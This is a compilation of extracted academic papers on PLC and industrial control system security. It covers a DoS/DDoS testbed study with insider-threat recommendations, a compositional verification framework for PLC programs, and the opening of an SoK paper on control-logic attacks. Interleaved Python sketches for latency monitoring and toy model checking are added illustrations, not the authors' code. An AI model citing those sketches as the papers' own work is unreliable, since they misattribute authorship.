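As an illustration of the continuous-monitoring idea that complements the signature-based detection used in the testbed, the sketch below periodically times a TCP connection to the PLC and raises an alert when the response time drifts far above its normal range, mirroring the latency degradation reported above. It is not part of the paper's SmoothSec/Snort setup; the address, port, thresholds and probing interval are assumptions made for the example.

# Illustrative latency monitor for a PLC (not the detection tooling used in
# the paper).  It times TCP connections to the PLC's communication port and
# flags response times far above the normal baseline, the kind of degradation
# observed during the DoS experiments described above.

import socket
import time

PLC_HOST = "192.168.0.10"   # hypothetical PLC address for this sketch
PLC_PORT = 102              # port used for PLC communication in the testbed
BASELINE_MS = 10.0          # assumed normal upper bound for response time
ALERT_FACTOR = 10           # alert when latency exceeds 10x the baseline

def probe_latency(host, port, timeout=2.0):
    """Return the TCP connect time in milliseconds, or None on failure."""
    start = time.monotonic()
    try:
        with socket.create_connection((host, port), timeout=timeout):
            pass
    except OSError:
        return None
    return (time.monotonic() - start) * 1000.0

def monitor(interval=1.0):
    while True:
        latency = probe_latency(PLC_HOST, PLC_PORT)
        if latency is None:
            print("ALERT: PLC not reachable (possible DoS or outage)")
        elif latency > BASELINE_MS * ALERT_FACTOR:
            print(f"ALERT: PLC response time {latency:.0f} ms exceeds threshold")
        else:
            print(f"PLC response time {latency:.1f} ms (normal)")
        time.sleep(interval)

if __name__ == "__main__":
    monitor()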
According to the delay standard of the IEEE 1646-2004 The Automation Communication of Substations, high-speed messages must be transmitted between 2 ms and 10 ms [22]. In this context, when the needs of instant reaction of PLC is considered, latency occurs in the network traffic of the control systems due to DoS attack may lead to significant problems. It is easy to detect IP address of attacker when DoS attack is carried out from a single source. However, it is more difficult to detect DoS attacks from different IP addresses by performing IP spoofing. Thus, attackers use IP spoofing method to hide the IP addresses and uses bogon IP adresses such as the attack scenario handled in this paper (Fig. 7). Figure 7. Source IP addresses of DDoS attack packets When the rule information of a listed event shown in Fig. 6 is examined, it can be understood that event packets are the distributed denial of service (DDoS) attack packets described in Fig. 8. Figure 8. The signature acquired after DoS attack 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 83 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. IV. ANALYSIS RESULT In the vulnerability analysis DoS attacks were carried out on PLC, one of the most important component of ICS, and results of attacks indicated that PLCs were vulnerable to these attacks. The detection phase of attack analysis results have shown that needed precautions for possible attacks can be taken by monitoring the PLC communication traffic continuously. Although, signature based prevention systems (antivirus, IPS, etc.) are believed to have a great success against the known cyber attack, they are not effective enough against new malicious payloads emerging in every second, especially the zero day vulnerabilities. For this reason, adjusting network traffic norms and thresholds with continuous monitoring provides constituting attack patterns for alerting network administrators / security experts. Thus, it will be possible to prevent malicious packets from infiltrating and harming the system, while ensuring that the legal packets are not delayed and prevented in the context of the continuity dimension of ICS. When the phases of the attacks in the testbed are examined, it is understood that the network topology and the determination of the target are vital factors for implementing successful attacks. However, in the event that the attacker is an insider within the organization and has privileged authorization over ICS systems, the success rate and destructive effects of the attack will increase. For this reason, it is very important to monitor the operations performed by employees with privileged authorization on ICS and to regulate their authority. V. I NSIDERS EFFECTS AND SOLUTION SUGGESTIONS Some studies investigating the causes of information security threats suggest that careless or malicious personnel with Access authorization are more hazardous and destructive than hackers, malicious software and troubled hardware [23,24]. In other studies, it is estimated that the abuse of privileged accounts is at high risk during insider attacks and this kind of attacks will increase in the coming period [25, 26]. Such risks are also prevalent for ICS and if the necessary security measures are not taken for insider threat, the effects for ICS will be much more devastating. 
Because, the detection and prevention of an at tack will be so difficu lt in the event that an insider has the knowledge of the network topology and components of the ICS. Protection from insider attacks requires specific solutions. However, when organizations' cyber security solutions are examined, it appears that most of them focus on external threats [27]. Security solutions to be used for internal and external threats should not be considered separately on the contrary they should be carried out in an integrated manner [28]. In order to prevent internal threats, not only technological solutions but also human factors should be evaluated. In addition to ordinary user accounts, ICS also has administrator accounts that are owned by IT staff with privileged authorization within the system. These accounts are mostly used for management, maintenance and repair of systems. One of the goals of the attackers to achieve their ultimate goal is the privileged accounts and their passwords used in the system. The seizure of one of these account's password by the attackers can cause the whole system to be seized. The Maroochy Water Service Breach incident, one of the attacks on ICS implemented by the insiders, was derived from the fact that the user account of a discarded employee was not removed from authorized accounts [29]. Ukrainian Power Grid Attack also was stemmed from careless and untrained users. Attackers gained privileged accounts from these users and causing about 225,000 people to be affected. Stuxnet is one of the most well-known target driven attack carried out on ICS. Although it is not known ex actly how this attack was carried out, majority of the rese archers think that the attackers got help from an insider for carrying out such a complicated attack. The main reason of this opinion is that ICS, the target of the attack, have an air gap structure isolated from the outside [30]. The control and management of privileged accounts, one of the most important causes of ICS attacks, is an important information security issue that needs to be assessed. Many measures and procedures have been proposed by researchers to solve this problem. Although the objectives of the solutions proposed by the researchers are the same, they involve different approaches [31-34]. A control mechanism should be developed on the basis of the issues discussed above to prevent exploitation of privileged accounts during insider attacks. The developed control mechanism should involve; Prevention unauthorized access to components of the ICS Increasing ICS resistance to password attacks Training and expanding awareness of staff on cyber security Regulation of access control to ICS components Keeping logs to follow up transactions performed by authorized personnel Clearly defining the limits of re sponsibility within the ICS Ensuring to include organizational managers in the IT security process. Figure 9. The position of control mechanism within ICS 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 84 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply. The control mechanism to be established in accordance with the specified points should run integrated with ICS. The control mechanism must be located between the ICS and the authorized personnel as an additional layer of security in accessing the components of the ICS infrastructure (Fig. 9). VI. 
C ONCLUSION Many critical infrastructures managed by ICS do not have adequate security assessment against cyber attacks. These critical systems can face many threats, unless the security vulnerabilities of the ICS are determined and the necessary measures are taken to overcome them. In this context, critical ICS components need to be monitored in real time so that ICS, which significantly affect our social lives, can survive with minimal damage from potential cyber threats and can be activated as soon as possible. As a result of analysis, it has been seen that detection based solutions including continuous quality monitoring and behavior based testing are more effective than security measures based on preventing due to new malware emerging every second. Furthermore, organizations with critical infrastructure to prevent Insider attacks should develop and implement a control mechanis m for staff with privileged authority over ICS and other employees. The operations on ICS of all employees who are likely to become an insider should be monitored and recorded. It should not be forgotten that attacks aimed ICS may carry out not only from outside but also from a trusted staff with privileged account. R EFERENCES [1] H. Farhangi, "The path of the smart grid," IEEE Power and Energy Magazine, vol. 8, no. 1, pp. 18-28, Dec. 2010. [2] P. Motta Pires and L. H.g. Oliveira, "Security Aspects of SCADA and Corporate Network Interconnection: An Overview," in Proc. 2006 Int. Conf. on Dependability of Computer Systems , pp. 127-134. [3] V. M. Igure, S. A. Laughter, and R. D. Williams, "Security issues in SCADA networks," Computers & Security, vol. 25, no. 7, pp. 498-506, Oct. 2006. [4] M. Hentea, "Improving Security for SCADA Control Systems," Interdisciplinary Journal of Information, Knowledge, and Management, vol. 3, pp. 073-086, 2008. [5] S. Rautmare, "SCADA system security: Challenges and recommendations," in Proc. 2011 Annual IEEE India Conf. , pp. 1-4. [6] S. Clements and H. Kirkham, "Cyber-security considerations for the smart grid," in Proc. 2010 IEEE PES General Meeting , pp. 1-5. [7] R. E. Johnson, "Survey of SCADA security challenges and potential attack vectors," in Proc. 2010 Int. Conf. for Internet Technology and Secured Transactions , pp. 1-5. [8] A. Nicholson, S. Webber, S. Dyer, T. Patel, and H. Janicke, "SCADA security in the light of Cyber-Warfare," Comput. Secur., vol. 31, no. 4, pp. 418-436, June 2012. [9] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," in Proc. 2013 IEEE 8th Int. Conf. on Industrial and Information Systems , pp. 81-85. [10] M. Jensen, C. Sel, U. Franke, H. Holm, and L. Nordstr m, "Availability of a SCADA/OMS/DMS system - A case study," in Proc. 2010 IEEE PES Innovative Smart Grid Technologies Conf. Europe , pp. 1-8. [11] T. Peng, C. Leckie, and K. Ramamohanarao, "Survey of network-based defense mechanisms countering the DoS and DDoS problems," ACM Comput. Surv., vol. 39, no. 1, pp. 1-42, Apr. 2007 2007, Art. no. 3. [12] E. Byres, "Defense-In-Depth: Reliable Security To Thwart Cyber- Attacks," Pipeline & Gas Journal, vol. 241, no. 2, Feb. 2014. [13] D. Kushner, "The real story of stuxnet," IEEE Spectrum, vol. 50, no. 3, pp. 48-53, Mar. 2013. [14] E. Byres, D. Hoffman, and N. Kube, "On Shaky Ground A Study of Security Vulnerabilities in Control Protocols," in Proc. 2006 5th Int. Topical Meeting on Nuclear Plant Instrumentation, Controls, and Human Machine Interface Technology vol. 1, pp. 782-788. [15] A. 
A_hierarchy_framework_on_compositional_verification_for_PLC_software.pdf
The correctness verification of embedded control software has become an important research topic in the embedded systems field. The paper analyses the present state of correctness verification for control software as well as the limitations of existing technologies. To meet the high reliability and high security requirements of control software, the paper proposes a hierarchical framework and architecture for the verification of control software (PLC programs). The framework combines the technologies of testing, model checking and theorem proving. The paper introduces the construction, flow and key elements of the architecture.
A Hierarchy Framework on Compositional Verification for PLC Software
Litian Xiao1,2 and Mengyuan Li
1 Beijing Special Engineering Design and Research Institute, Beijing 100028, China
{xiao_litian & li_mengyuan2000}@sina.com
Ming Gu and Jiaguang Sun
2 School of Software, TNList, KLISS, Tsinghua University, Beijing 100084, China
{guming & jgsun}@tsinghua.edu.cn
Keywords-PLC software; compositional verification; hierarchy framework; verification architecture

I. INTRODUCTION
A Programmable Logic Controller (PLC) is a kind of embedded system used in automatic control systems. PLC software is the core for controlling, monitoring and managing other devices, and its program logic drives the action circuits of the control system. PLC software now has a larger scale and more complex functions, so its correctness is difficult to ensure. Its errors or bugs can lead to unpredictable or uncontrolled behavior of the control system [1]. Because embedded testing means are limited, a PLC program cannot be directly tested and verified [2]. Its testing generally requires building the operating environment from the actual hardware and software, and sometimes even has to be completed in the real environment. Such testing is costly and cannot guarantee test coverage, and some boundary or erroneous tests may cause faults in the controlled devices, serious damage, or even accidents. How to ensure the correctness of PLC software in safety-critical automatic control systems has therefore become an important research topic in the field of embedded systems. The paper presents a hierarchy framework for compositional verification and strategies for the correctness verification of PLC software. It mainly introduces the architecture and key factors of the hierarchy framework, together with the main work and achievements of the research.

II. RELATED WORK ON SOFTWARE VERIFICATION
To ensure software correctness, testing as well as formal, mathematical and systematic methods are used to avoid program bugs. The main methods are aimed at checking programs on the three levels of code, model and statute, which include:
• Testing methods: they find and reproduce bugs in a program while specific functional segments or code segments (test cases) are actually executed in a particular scenario or on given input data.
• Verification methods: by means of an abstraction mechanism, the program code is transformed into a specific mathematical representation, and the correctness conclusion for the program is then obtained by searching, reasoning, proof and other means based on that representation.
The corresponding technologies are testing, model checking and theorem proving, and all of them can currently be applied to PLC programs.

A. Testing Technology on Code Level
Software testing is an effective means to find program bugs, and the bugs it finds really exist in the program. The biggest drawback of testing is its incompleteness, i.e. it is difficult to traverse all possible execution paths for even a slightly complex program, and it is difficult to design a systematic approach that completely covers all code with a limited set of test cases. For embedded software testing, hybrid prototyping is mainly used by international research institutions such as NASA, Boeing and the Israel Air Force. It creates a test environment by means of emulators, simulators, software modeling and injected host computer data. The hardware prototype components of the hybrid prototype are directly connected to the target system and are given controlled response signals.
The response signals are the same as the actual signals of real system and environment. Host computer injects testing data into target system based on software model, control model and processes. Such research is also a hot issue, but test cost is very high. B. Model Checking Technology on Model Level Verification method and test technology have strong complementarity. Also verifica tion method is a hot research issue [3]. Model checking is a type of verification method based on model, searches state space and verifies specified nature. Generally function nature is safety property, liveness property and fairness property etc. [4] The method is reliable and complete for specified nature. Its biggest problem is "state space explosion". Although some scholars have studied model checking algorithms for infinite-state, currently these algorithms cannot be applied to general purposes. This research is sponsored by NSFC Pr ogram (No.90718039, No.91018015 and No.60811130468) of China ____________________________________ 978-1-4799-3279-5 /14/$31.00 201 4 IEEE  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply. Even if model checking obtains an affirmative conclusion, it is not able to ensure other properties such as non-functional properties (e.g. divided by zero, data overflow, etc.). Furthermore, model itself is not a program and is gotten by abstracted a real program codes. In the abstracted process, a constructed model is allowed to increase some non-existent actions in actual program, and not to delete any actions. Such abstracted mode possibly leads to false reports in the verification process--incorrec tly report errors in actual program. The model must be further refined to eliminate false reports. Now classic model checking tools include SPIN [5], NuSMV[6] and UPPAAL[7], etc. C. Theorem Proving Technology on Statute Level Another type of verificati on method is based on mathematical proof. These methods firstly describe the behavior characteristics of a system with a series of logical formulas. Then some properties are proven by means of a logical system (or proof tool s), inference rules provided by deductive methods or falsifi cation established goals. Theorem proving method is very suitable for the verification of infinite stat e systems. Because most of the proving tools (e.g. PVS [8], COQ[9], Nqthm[10]) provide for higher-order logic which has the ability to describe infinite data structures, they are not sensitive to the size of state space. However, there are some flaws on theorem proving methods. These methods don t have high automation degree and require a lot of manual operation. A high degree of expertise is required for theorem proving, and they need to be familiar with particular domain. D. Verification Technolog y on PLC Program The above-mentioned technologies can be used to verify PLC programs and have sim ilar advantages and disadvantages. Now there are few verification technologies for PLC program on practical achievement. Many researchers have studied ho w to do model-checking for PLC program. Some research directly converse specific PLC program into the input of model-checking tool. They demand single restricti on model of PLC prog ram, i.e. Boolean variables exist only in the program , and jump statements or multiple blocks or functions cannot [11]. Others abstract PLC program into models for model -checking tool. 
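As a rough, self-contained illustration of the approach sketched above, the following Python fragment performs explicit-state reachability checking over a Boolean-only PLC model; the seal-in program, the safety property and all names are hypothetical, and the sketch only stands in for (rather than reproduces) the input formats of tools such as SPIN, NuSMV or UPPAAL:

# Minimal explicit-state reachability check for a Boolean PLC model.
# Illustrative sketch of the "convert the PLC program into a model and
# check a safety property" idea; the scan() transition function and the
# property are hypothetical examples, not any cited tool's notation.
from collections import deque
from itertools import product

def scan(state, inputs):
    """One scan cycle of a toy two-output interlock, modelled on Booleans.

    state  = (latch,)        -- internal memory bit
    inputs = (start, stop)   -- sensor/button readings
    returns (new_state, outputs) with outputs = (motor, brake)
    """
    (latch,) = state
    start, stop = inputs
    latch = (latch or start) and not stop   # classic seal-in circuit
    motor = latch
    brake = not latch
    return (latch,), (motor, brake)

def violates(outputs):
    motor, brake = outputs
    return motor and brake                  # safety: never both energised

def check(initial=(False,)):
    seen, frontier = {initial}, deque([(initial, [])])
    while frontier:
        state, trace = frontier.popleft()
        for inputs in product([False, True], repeat=2):   # all input combos
            nxt, outs = scan(state, inputs)
            if violates(outs):
                return trace + [(inputs, outs)]            # counterexample
            if nxt not in seen:
                seen.add(nxt)
                frontier.append((nxt, trace + [(inputs, outs)]))
    return None                                            # property holds

if __name__ == "__main__":
    cex = check()
    print("safe" if cex is None else f"counterexample: {cex}")

Because every variable is Boolean, the reachable state space stays finite and small, which is exactly the restriction the single-restriction conversions above rely on; richer data types, timers and registers quickly blow up the reachable set, which is why the abstraction and compositional strategies discussed next matter.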
However, these models are somewhat abstract distortion and their checking scale is small [12]. The works can partly solve the problems of model-checking for some particular PLC programs, but there is a lack of reduced strategy of the state space size. Combinatorial model-checking are widely studied and applied for decreasing state space size. The works depend on the manual definition of both m odules combination and divided assertions, which reduces the autom ation of model-checking. Their success depends largely on the choice of abstract variables. On the theoretical research of combination model-checking, the works use linear temporal logic (LTL) or introduce a temporal operator to TLA, which construct different combinatorial verifying frameworks and corresponding combinatorial verify ing rules. Some methods can explain some cyclic verification rules in LTL and the cycle combination rules based on Moore machine model or Lattice theory [13]. On theorem proving for PLC program, some researches design simple PLC modular model and assume the current value increases monotonically and no resetting action course. Then the model is verified by theorem proving tool Isabelle/HOL. Others define PLC instruction semantics and verify a property on safety or time sequence by theorem proving tool COQ [14]. The mentioned work is so limited that they cannot be taken directly to verify general PLC pr ograms. Moreover, they didn t implement the derivation of overall properties for whole system from sub-system properties. III. T HE FRAMEWORK FOR COMPOSITIONAL VERIFICATION OF PLC PROGRAM The above-mentioned studies cannot systematically solve the verification problems of PLC program. We combine the characteristics of the PLC program with the advantages of different verification m eans, and make PLC program verification technology and formal verification methods practically used. PLC program is a type of embedded software and has its own characteristics: /g121Most PLC programs are executed in embedded hardware environment. Their logi cal structure is relatively simple. They have short and less kind of statements. /g121A PLC program is written by hardware instructions (or represented by ladder diagrams). So the abstract process of its model is relatively simple. /g121PLC program still has most mechanisms of a high-level programming language. What the verification problems of PLC program need to deal with are similar as traditional program. /g121PLC program is executed in sequence within one scanning cycle, and then next scanning cycle after refreshed output mapping. Inside a scanning cycle, it is similar to sequential programs. In whole scanning peri od, PLC shows as output responses for different input signals. Because cumulative values of various timers or counters are cross a scanning cycle, a PLC program cannot simply think of as logic responses transformed from input to output. Compared PLC program with high-level language programs, its verification is more close to mathematical representation. Therefore, the verification of PLC program has its advantages. The correctness of a PLC pr ogram should have the correctness of dynamic behaviors and static properties from macroscopic or external feat ures. It should also have the correctness of coding and control timing sequence from microcosmic or internal features. The control timing sequence can be divided into that cr oss scanning cycle and within  Authorized licensed use limited to: Air Force Institute of Technology. 
Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply. scanning cycle. The two sequences influence the dynamic behaviors and the static properties of a PLC program. The research combines the verification technologies on three levels to verify the correctness of PLC program, i.e. for PLC program coding correctness are verified on code level, dynamic behaviors (or cross scanning cycle) on model level and static properties (or within scanning cycle) on statute level. The hierarchy framework for compositional verification of PLC Program is showed as Fig.1. The framework is constructed by mutual complemented technologies including testing, model checking and theorem proving. The research needs easy to be used and realize automatic verification for PLC program. IV. T HE ARCHITECTURE OF THE COMPOSITIONAL VERIFICATION FOR PLC PROGRAM The flow and the constructed key elements of the compositional verification architecture are showed as Fig.2. Generally the obtained PLC program is the code. In order to obtain its model and hig h-level statute, conversion method must be provided from codes on low level to models on high level and statute on top level. Firstly, the formal description of PLC program and the structure of denotational semantics need to study. Because of the variables of register, bit and a series of stack operations, the exte nded definition of /g540-calculus is studied and used to define PLC program. Correctness on code level is required by the code correctness. PLC program is decomposed into different modules on basis of control objects and responses. The compositional testing solves the problem which testing cannot be executed in the real environment. It can reduce testing scale and improve testing coverage. Selected typical test cases are directly performed to find most of the bugs. Because testing method is very much dependent on test cases selection, there will be fail-to-report bugs. To compensate this deficiency, PLC program verification is studied on model and statute level. Correctness on model level is the correctness constraints of software design. From the perspective of software design, most key verification is control timing sequence cross scanning cycle in PLC program. It verifies the correctness of dynamic behaviors while PLC program runs. The design defects and mistakes are found on model level. Because of the existence of register variables in PLC program, the actual state space may be very large on model checking. The state space size is reduced by using combinatorial model checking to avoid "state space explosion" during verification. Model checking is also used to compensate the fail-to -report problems which are caused by insufficient testing coverage. Correctness on statute level is the correctness constraints of PLC program requirements. Its constraint ensures the correctness of design and code for PLC program. The correctness of PLC software within a scanning cycle is verified by theorem proving. Model checki ng can find and report wrong routes by means of segmented or merged scan cycles. The theorem proving verification tests out whether the report is a false report. COQ is a main tool in th e field of theorem proving. It is based on the calculus of inductive constructions, and has the powerful base of mathemati cal model and good expansibility. It has a complete set of tools, a full-time R & D team and supports open source. So the tool is chosen for theorem proving. 
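To make the statute-level idea concrete, the following toy Python check exhaustively verifies a static property over a single scan cycle. It is only a stand-in for the actual COQ development: brute-force enumeration works here solely because the example inputs are three Booleans, whereas theorem proving is needed for infinite or unbounded state such as timers, counters and numeric registers. The drive-enable logic and the property are hypothetical:

# Toy stand-in for the statute-level check: verify a static property over
# a single scan cycle by exhausting all Boolean input combinations.
# A real development would state and prove this in Coq over the program
# semantics; the program and property here are hypothetical.
from itertools import product

def single_cycle(emergency_stop, sensor_ok, run_request):
    """Output logic of one scan cycle for a toy drive-enable block."""
    enable = run_request and sensor_ok and not emergency_stop
    alarm = emergency_stop or not sensor_ok
    return enable, alarm

def property_holds(inputs, outputs):
    """Statute-level property: the drive is never enabled while alarming."""
    enable, alarm = outputs
    return not (enable and alarm)

def exhaustive_check(n_inputs=3):
    for inputs in product([False, True], repeat=n_inputs):
        outputs = single_cycle(*inputs)
        if not property_holds(inputs, outputs):
            return inputs          # counterexample found
    return None                    # property holds for every input valuation

if __name__ == "__main__":
    cex = exhaustive_check()
    print("property holds on all inputs" if cex is None else f"fails on {cex}")

Within one scan cycle the program behaves as a pure function from inputs to outputs, which is what makes this style of per-cycle reasoning, and its mechanization in a proof assistant, tractable.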
Three levels of technologies verify the correctness of the functions and properties of a PLC program. From their different levels they ensure the correctness of the PLC program with respect to the verified properties the users are concerned with.

V. MAIN WORK AND ACHIEVEMENTS
The work focuses on testing and verification for PLC programs and includes the following aspects.
As its foundation, the work has proposed the verification architecture and methods for PLC program correctness. In order to ensure that combinatorial testing, model checking and theorem proving share identical verifying semantics within the architecture, it has abstracted and described the typical PLC working modes, the system models, and the syntax and semantics of PLC programs. The mathematical description, configuration definition, several operations and related function definitions have been studied for the architecture, based on the above framework and the partitioned structure of the PLC program. The formal description, the denotational semantics and the functions of the PLC program are defined and constructed with the extended λ-calculus used as a tool. The verification technologies on the three levels complement each other on this identical basis.
[Fig. 1: Hierarchy Framework for Compositional Verification of PLC Program. It combines compositional testing (code level), compositional model checking (model level) and compositional theorem proving (statute level) into PLC program correctness for the focused properties.]
[Fig. 2: The Architecture of the Compositional Verification for PLC Program. It covers the formal description and denotational semantics based on the extended λ-calculus; program partition, testing agents and test cases on the code level; the arithmetic symbolic transition system, linear temporal logic and composition checking rules (model rules, properties rules) on the model level; and the COQ theorem proving tool with its proving strategies, proof properties, intuitionistic first-order logic and the Gallina language on the statute level.]
On the code level, corresponding to PLC software testing, the work analyzes the applicability of static testing, testing in the real environment, hardware checker testing, instrumentation testing and simulation testing. It presents a combinatorial mechanism for the software testing framework and testing method. Based on software components replacing functional parts, high-level language code segments and compositional test modules are defined through equivalent denotational semantics and a compositional testing strategy. The configuration is described and simulated in software, and PLC program testing is converted into the equivalent testing of high-level language program segments. The framework and method allow PLC software testing to be decomposed into several small tests. This solves the testing problems of restoring the real running environment, limit boundaries and missing environment support, and it also improves testing coverage.
On the model level, according to the PLC program architecture, formal description and semantics definition, an arithmetic symbolic transition system is introduced by means of linear temporal logic syntax and semantics.
It solves the problem that basic symbolic transition systems cannot accurately describe the system in practical application. To verify temporal properties of PLC circuit across scanning cycle, variables sets, predicates and migration functions are designed as transformation from a PLC program to a symbolic transition system. Some strategies of model checking are provided for the transition system. A set of the model and the properties of the composite verification rules are defined. They verify the correctness of dynamic behavior wh en PLC program runs, and reduce the verification scale. Th e defined compositional verification rules ensure the accuracy of verification strategies based on mathematical proof. On statute level, the work presents a correctness verification framework based on theorem proving technology for PLC program. The correctness or static properties are verified in one scanning cycle. Based on COQ Gallina language, PLC program is modelled by the inductive conversion of the semantics structure. The denotational semantics is described to prove program properties. The work can deal with the model verification under infinite state space. On application, a pendulum cont rol system is chosen as a typical example and an experiment . PLC output drive module of the pendulum control system is verified by compositional verification method. It is te sted under the boundary limit conditions and non-enviro nment support. Its correctness properties such as system safety, liveness and fairness are verified by model checking and theorem proof under compositional strategies. Experimental results are compared with the general condition and show that the framework has effectiveness and advantage. VI. C ONCLUSION The paper briefly introduces th e compositional verification framework for PLC programs. The specific strategies, rules, function and model in the framework and architecture can be referred to Reference [15]-[17 ]. Although the research on the framework and architecture has obtained some achievements, some works need further to st udy. For example, model checking and theorem proving tools need to develop. The tools should support that PLC prog ramming language such as IL and ladder diagram is automatically converted to models and verification function. They w ill enhance the verification usability. A CKNOWLEDGMENT The authors would like to thank all colleagues who contribute to this study. REFERENCES [1] Lewis R. Programming industrial contr ol systems using IEC 1131-3, volume 50 of Control Engineer ing Series. Stevenage, United Kingdom: The Institution of Electrical Engineers, 1998. [2] B. Kang, et al. A Design and Test Technique for Embedded Software. Proceedings of the 2005 Third ACIS Int'l Conference on Software Engineering Research, Manageme nt and Applications. Michigan: Mount Pleasant, 2005: 160-165. [3] Mertke T, Frey G. Formal Verification of PLC-programs generated from Signal Interpreted Petri Nets. Proceedings of Proceedings of the SMC 2001, Tucson (AZ) USA, 2001: 2700-2705. [4] H. S. Hong, et al. Data flow testing as model checking, The 25th International Conference on Software Engineering. IEEE Computer Society, US: Portland, 2003:232-242. [5] The Spin homepage: http://spinroot.com/spin/whatispin.html. [6] The NuSMV homepage: http://nusmv.irst.itc.it/. [7] The UPPAAL homepage: http://www.uppaal.com/. [8] S. Owre, S. P. Rajan, J. M. Rushby, N. Shankar, M. K. Srivas. PVS: combining specifications, proof checking and model checking. R. Alur and T. A. Henzinger, eds. 
LNCS: C AV 96, 1996, 1102: 411-414. [9] The COQ toolkit. http://COQ.inria.fr/. [10] R. S. Boyer, J. S. Moore. Proving theorems about lisp functions. Journal of the ACM, 1975, 22(1): 129-144. [11] V. Gourcuff, O. de Smet, J. M. Faure. Improving large-sized PLC programs verification using abstractions. Proceedings of the 17th World Congress on The International Federation of Automatic Control, Seoul, Korea, July, 2008: 5101-5106. [12] Bastian Schlich Jorg Brauer Jorg Wernerus Stefan Kowalewski. Direct Model-checking of PLC Programs in IL. Proceedings of 2nd IFAC Workshop on Dependable Control of Discrete Systems. cole Normale Sup rieure de Cachan, Italy, 2009: Vol2(1). [13] P.Maier. A Lattice-Theoretic Framework For Circular Assume- Guarantee Reasoning [PhD thesis ]. Saarbryucken: University at des Saarlandes, 2003. [14] Jan Olaf Blech, Sidi Ould Biha. Verification of PLC properties based on formal semantics in Coq. Proceedings of the 9th international conference on Software engineering and formal me thods (SEFM'11). Springer- Verlag Berlin, Heidelberg, 2011: 58-73. [15] Xiao Litian, Gu M, Sun Jiaguang. The Denotational Semantics Definition of PLC Programs Based on Extended -Calculus. Communications in Computer and Information Science, 2011, 176(II): 40-46. [16] Litian Xiao, Rui Wang, Ming Gu, Jiaguang Sun. Semantic characterization of programmable logic controller programs. Mathematical and Computer Modelling, 2012, 55(5-6): 1819- 1824. [17] Xiao Litian, Gu Ming, Sun Jiaguang. The Verification of PLC Program Based on Interactive Theorem Proving Tool COQ. Proceedings of 4th IEEE International Conference on Computer Science and Information Technology(ICCSIT2011) Chengdu, China, pp.374-378, June, 2011.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:14 UTC from IEEE Xplore. Restrictions apply.
SoK_Attacks_on_Industrial_Control_Logic_and_Formal_Verification-Based_Defenses.pdf
Programmable Logic Controllers (PLCs) play a critical role in industrial control systems. Vulnerabilities in PLC programs might lead to attacks causing devastating consequences to critical infrastructure, as shown in Stuxnet and similar attacks. In recent years, we have seen an exponential increase in vulnerabilities reported for PLC control logic. Looking back on past research, we found extensive studies that explored control logic modification attacks, as well as formal verification-based security solutions. We performed a systematization of these studies and found attacks that can compromise a full chain of control and evade detection. However, the majority of the formal verification research investigated ad-hoc techniques targeting PLC programs. We discovered challenges in every aspect of formal verification, arising from (1) the ever-expanding attack surface of evolved system designs, (2) the real-time constraint during program execution, and (3) the barrier to security evaluation given proprietary and vendor-specific dependencies of the different techniques. Based on the knowledge systematization, we provide a set of recommendations for future research directions, and we highlight the need to defend against security issues in addition to safety issues.
SoK: Attacks on Industrial Control Logic and Formal Veri cation-Based Defenses Ruimin Sun Northeastern University r [email protected] Mera Northeastern University [email protected] Lu Northeastern University [email protected] Choffnes Northeastern University [email protected] Index Terms PLC, attack, formal veri cation 1. Introduction Industrial control systems (ICS) are subject to attacks sabotaging the physical processes, as shown in Stuxnet [33], Havex [46], TRITON [31], Black Energy [8], andthe German Steel Mill [63]. PLCs are the last line incontrolling and defending for these critical ICS systems. However, in our analysis of Common Vulnerabilities and Exposures (CVE)s related to control logic, we haveseen a fast growth of vulnerabilities in recent years [86].These vulnerabilities are distributed across vendors anddomains, and their severeness remains high. A closer lookat these vulnerabilities reveals that the weaknesses behindthem are not novel. As Figure 1shows, multiple weak- nesses are repeating across different industrial domains,such as stack-based buffer over ow and improper inputvalidation. We want to understand how these weaknesseshave been used in different attacks, and how existingsolutions defend against the attacks. Among various attacks, control logic modi cation at- tacks cause the most critical damages. Such attacks lever-age the aws in the PLC program to produce undesiredstates. As a principled approach detecting aws in pro-grams, formal veri cation has long been used to defend Figure 1: The reported common weaknesses and the af-fected industrial sectors. The notation denotes the numberof CVEs. control logic modi cation attacks [24], [26]. It bene ts from several advantages that other security solutions failto provide. First, PLCs have to strictly meet the real-time constraints in controlling the physical processes. Thismakes it impractical for heavyweight solutions to performa large amount of dynamic analysis. Second, the physicalprocesses are often safety-critical, meaning false posi-tives are intolerable. Formal veri cation is lightweight,accurate, and suitable for graphical languages, which arecommonly used to develop PLC programs. Over the years, there have been extensive studies investigating control logic modi cation attacks, and for-mal veri cation-based defenses. To understand the currentresearch progress in these areas, and to identify openproblems for future research directions, we performed asystematization of current studies. Scope of the paper. We considered studies presenting control logic modi cation attacks through modifying pro-gram payload (i.e. program code), or feeding special inputdata to trigger program design aws. We also consideredstudies presenting formal veri cation techniques to protectthe affected programs, including behavior modeling, statereduction, speci cation generation, and veri cation. For-mal veri cation of network protocols is out of the scopeof the paper. We selected the literature based on three cri-teria: (1) the study investigates control logic modi cationattacks or formal veri cation-based defenses, (2) the studyis impactful considering its number of citations, or (3) thestudy discovers a new direction for future research. Systematization methodology. Our systematization was based on the following aspects. We use attack todenote control logic modi cation, and defense to denoteformal veri cation-based defense. 
